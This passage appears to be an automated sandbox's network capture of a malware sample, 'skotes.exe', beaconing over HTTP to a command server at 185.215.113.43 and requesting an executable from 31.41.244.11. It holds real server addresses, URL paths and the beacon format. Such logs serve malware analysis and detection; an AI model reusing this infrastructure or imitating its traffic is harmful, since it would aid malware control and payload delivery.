Dec 18, 2024 13:41:26.672700882 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	50068	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:28.324867964 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:29.670103073 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	50069	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:31.434040070 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:32.792284966 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	50070	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:34.435043097 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:35.771806955 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	50071	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:37.625159979 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:38.957360983 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	50072	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:40.598829031 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:42.098782063 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	50073	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:43.934849024 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:45.279432058 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	50074	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:46.928276062 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:48.286134005 CET	299	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 36 38 39 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 30 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d <c>1016899001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	50075	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:48.459115982 CET	146	OUT	GET /files/unique3/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Wed, 18 Dec 2024 12:17:47 GMT If-None-Match: "6762bd6b-1da600"
Dec 18, 2024 13:41:49.765341043 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:49 GMT Last-Modified: Wed, 18 Dec 2024 12:17:47 GMT Connection: keep-alive ETag: "6762bd6b-1da600"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	50076	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:52.154851913 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016899001&unit=246122658369
Dec 18, 2024 13:41:53.491765022 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	50077	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:55.283826113 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:56.615214109 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	50078	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:58.246721983 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:59.601874113 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	50079	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:01.362675905 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:02.712543964 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	50080	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:04.344043970 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:05.692070007 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	50081	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:07.433765888 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:08.777156115 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	50082	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:10.406217098 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:11.743484974 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	50083	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:13.496994019 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:14.845196009 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	50084	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:16.485981941 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:17.820522070 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	50085	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:19.576247931 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:20.916937113 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	50086	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:22.588006973 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:24.151643038 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	50087	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:25.904474974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:27.244955063 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	50088	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:28.873923063 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:42:30.225770950 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.8	50089	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:31.966454029 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:42:33.301979065 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.8	50090	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:42:35.070357084 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
